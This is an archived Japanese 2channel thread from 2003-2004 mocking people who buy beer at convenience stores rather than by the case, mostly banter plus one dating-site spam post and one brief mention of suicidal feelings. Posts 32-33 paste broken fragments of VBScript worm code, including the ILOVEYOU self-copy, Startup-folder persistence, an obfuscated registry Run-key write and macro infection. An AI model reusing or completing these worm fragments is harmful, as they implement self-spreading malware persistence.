5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

  コンビニでビールを買う香具師って  

1 :チャダ ◆PFYaW7Fw3I :03/08/03 13:02
いまは、ビールはケース単位で激安店で買うのが当たり前!
コンビニで定価でビールを買ってる香具師は逝け!

2 :いい気分さん:03/08/03 13:03
>>1
すぐ路上でのみたいんだよ。

3 :いい気分さん:03/08/03 13:03
当たり前田の

4 :いい気分さん:03/08/03 13:13
クラキマイ(w

5 :いい気分さん:03/08/03 13:21
ぶーっ!

6 :いい気分さん:03/08/03 13:30
あたりまえだのクラキマイ

7 :いい気分さん:03/08/04 00:38
あたりまえだのくらたやすあき

8 :いい気分さん:03/08/04 01:31
駄スレのため終了

9 :いい気分さん:03/08/04 02:39
たまーに箱(24本)で買ってくアホもいる。

10 :いい気分さん:03/08/05 00:20
>>9
漏れは1ケース路上飲みですが何か?

11 :いい気分さん:03/08/05 15:05
>>10
ああ!あんときのおまいか!

12 :チャダ ◆PFYaW7Fw3I :03/08/07 19:30
もまいら語れ!

13 :いい気分さん:03/08/07 20:11
珊瑚でっす。みんな元気ぃ?夏だね
☆あたしね、今どこにいると思う?えへっ、実はアメリカなんだぁ。
でもアナタに逢いたくて、こーんなバイト始めちゃった♪
珊瑚に逢いに来てくれたら、なんと7日間会費無料サービスだし(^O^)
しかもしかも10分間も無料なんだよ〜〜!すごいでしょ!
見てくれたアナタにだけの特別サービス◎
二人っきりで楽しいことしようよ!まってるね♪♪♪♪

☆ ☆ ☆ http://www.gals-cafe.com ☆ ☆ ☆

14 :いい気分さん:03/08/11 23:26


15 :いい気分さん:03/08/14 13:54
(∀)

16 :いい気分さん:03/08/14 19:05
このスレにおいてはいったい何を意味するのか

17 :いい気分さん:03/08/14 19:35
このスレにおいてはビールを買う香具師を意味するのか

18 :あぼーん:あぼーん
あぼーん

19 ::03/08/18 00:45





20 :いい気分さん:03/08/22 19:24
(Д)ヘエー!!

21 :いい気分さん:03/08/26 12:45


22 :いい気分さん:03/08/26 15:58


23 ::03/08/29 01:39
/03 13:03
当たり前田の


4 :いい気分さん :03/08/03 13:13
クラキマイ(w


5 :いい気分さん :03/08/03 13:21
ぶーっ!


6 :いい気分さん :03/08/03 13:30
あたりまえだのクラキマイ


7 :いい気分さん :03/08

24 :いい気分さん:03/08/29 06:07
それはわかってんだけどね、箱買いして部屋に置いとくと、
普段の倍飲んじゃうのよ。
 結局高くつくし、体にも悪いでどうにもならない。
 
 俺みたいな意志薄弱な酒飲みは、毎回コンビニで決まった量買う方が
結局はお得な訳。
 
 むしろまとめ買いに向いてるのはつまみ類かな。

25 :いい気分さん:03/09/02 14:21
>>24
負け犬の言い訳

26 :いい気分さん:03/09/02 14:26
どのへんが負けいぬなんだろう


27 :いい気分さん:03/09/02 14:53
>>26
おまえのすべて(pppp

28 :。。。( ̄ー ̄) ニヤリッ:03/09/03 19:31
>>37
おまいの必死のネタも無反応だったな・・・・・センス無しpppp

29 :いい気分さん:03/09/03 19:46
必死で節約するほうが負け犬(pppp

30 ::03/09/08 23:02


31 :いい気分さん:03/09/08 23:10
俺はつい最近まで禁酒してたんだけど、
最近友達が留学に行ったりして寂しくなって欝になってて
朝の6時くらいからベランダでタバコ吸ってたら、何かそこから飛び降りたくなってきて
こりゃあ酒でも飲まないとさらに欝になると思ったんで近くのコンビニまで酒買いに行ったよ。
もし、家の近くにコンビニが無かったら死んでただろうな、俺。

32 :いい気分さん:03/09/08 23:51
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
cIf s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)

33 :いい気分さん:03/09/09 00:46
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
cIf s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)

34 :いい気分さん:03/09/09 02:35
コンビニもビールは198とかに値引きしてんじゃないの?

35 :いい気分さん:03/09/09 08:13
>1マルチポスト!

36 :いい気分さん:03/10/15 00:30
年寄り臭い



37 :いい気分さん:03/12/05 17:19
分さん :03/10/15 00:30
年寄り臭い




4 KB [ 2ちゃんねるも使っている 完全帯域保証 専用サーバ Big-Server.com ] 30,000円/月
★ 転送量

38 :いい気分さん:04/02/21 00:29
_| ̄|○




39 :いい気分さん:04/03/31 00:05
語れ

40 :いい気分さん:04/03/31 00:28
社会人は学生と違って金あるんだよ。
学生みたいに何でもかんでもあっちこっちの安い店にわざわざ
行って買う時間なんてないんだよ。



41 :いい気分さん:04/04/11 00:23
ふーん


42 :いい気分さん:04/05/06 12:14
負け犬だな

43 :SVの犬 ◆ldfFbZBKKc :04/05/19 00:35
コンビニでビール買いたい以前、
アルコール扱ってないや・・

44 :いい気分さん:04/05/19 01:05
コンビニで買ったほうがコンビニの利益になるからいいじゃない
バカじゃない?

45 :いい気分さん:04/05/19 12:47
>>1
単にお前が貧乏なだけだろ。
「超ダイエット日記」読め。
http://www.tcn-catv.ne.jp/~diet/hon.html

46 :いい気分さん:04/05/19 13:57
>>44
おまえの言いたいことが判らない
>>45
必死だな(藁

47 :いい気分さん:04/05/19 16:20
>>1
激しく同意!
コンビニでカップラーメン買ってる香具師みると笑ってしまう。
ん、まぁ夜食(ストアー閉店時)としてどーしても食いたいなら別かな。
ストアーで\98の物がコンビニでは\158
貧乏でスマソ。


48 :いい気分さん:04/05/19 19:08
コンビ二で買いは
おれにできる、ささやかなブルジョア行動。
優越感に浸りながら小ビールをカゴに入れる。
普通のカップラーメンを手にする。
ここまで登り積めた自分を感じる時。

ついでにいうとチャダは○イン○ートの店員。

49 :いい気分さん:04/05/20 16:21
ビールで箱買いするやつは大抵DQN

50 :いい気分さん:04/05/20 17:35
あほか

51 :いい気分さん:04/05/20 19:57
貧乏人は金銭感覚が麻痺してるから、コンビニでわざわざ高いものを買っても
気がつかないだけなのさ、俗に言う真綿で首を絞めてる状態の金銭感覚だね

8 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)